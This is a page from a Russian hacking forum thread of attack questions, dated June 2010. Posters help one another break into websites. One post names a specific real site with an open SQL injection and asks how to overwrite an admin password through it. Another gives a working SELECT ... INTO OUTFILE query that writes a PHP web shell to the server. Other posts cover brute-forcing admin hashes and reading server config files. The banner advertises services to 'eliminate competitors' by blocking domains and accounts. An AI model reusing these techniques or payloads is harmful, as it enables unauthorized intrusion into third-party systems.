Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1376 из 1393

1376

Опции темы

Поиск в этой теме

Опции просмотра

#13751

11.06.2010, 21:08

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

Bb0y дай линк почитать, а то я такого не знаю...

#13752

11.06.2010, 21:12

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от GOGA075

FlaktW у тебя же есть логин и пароль от админки...
тут никаких проблем нету..

Это хеш можно два года брутить.

#13753

11.06.2010, 21:14

Bb0y

Участник форума

Регистрация: 30.10.2009

Сообщений: 103

Провел на форуме:
736224

Репутация: 388

Отправить сообщение для Bb0y с помощью ICQ

Отправить сообщение для Bb0y с помощью Yahoo

2GOGA075
https://forum.antichat.ru/thread35207.html
https://forum.antichat.ru/thread119047.html
https://www.hackzone.ru/articles/view/id/7925/
тут подробнее от Qwazar http://qwazar.ru/?p=7

Последний раз редактировалось Bb0y; 11.06.2010 в 21:20..

#13754

12.06.2010, 11:28

qq6ka

Познающий

Регистрация: 21.05.2010

Сообщений: 37

Провел на форуме:
167126

Репутация: 55

Ищу пути. В /etc/init.d/apache есть

APACHE_HOME=/usr/apache
CONF_FILE=/etc/apache/httpd.conf
RUNDIR=/var/run/apache
PIDFILE=${RUNDIR}/httpd.pid
TOMCAT_CF=/var/apache/tomcat/conf/server.xml
TOMCAT55_CF=/var/apache/tomcat55/conf/server.xml

Но!
/etc/apache/httpd.conf, /var/apache/tomcat55/conf/server.xml - не читаются, видимо прав не хватает.

Кто с TOMCAT 5.5 работал, подскажите где ещё посмотреть полезную инфу.

#13755

12.06.2010, 13:19

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

кто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8

воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;

и вообще это реально?

#13756

12.06.2010, 13:57

I love this game

Познающий

Регистрация: 23.12.2008

Сообщений: 81

Провел на форуме:
460763

Репутация: 97

Отправить сообщение для I love this game с помощью ICQ

есть доступ к админке, через картинки не получилось залить шелл, но можно бекап бд и востановление бд, подскажите какой запрос нужно сделать что бы через востановление бд залить шелл

#13757

12.06.2010, 13:58

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

заливай .htaccess

#13758

12.06.2010, 14:01

I love this game

Познающий

Регистрация: 23.12.2008

Сообщений: 81

Провел на форуме:
460763

Репутация: 97

можно подробнее?

#13759

12.06.2010, 14:08

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

I love this game через восстановление БД тебе нужно знать путь корневой корректории.
а запрос
select '<? assert(stripslashes($_REQUEST[cmd])); ?>' into outfile '/home/WWW/shell.php';

#13760

12.06.2010, 14:10

I love this game

Познающий

Регистрация: 23.12.2008

Сообщений: 81

Провел на форуме:
460763

Репутация: 97

Но можно ж вроде через sql открыть phpinfo и оттуда уже узнаю диру?

Страница 1376 из 1393

1376

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход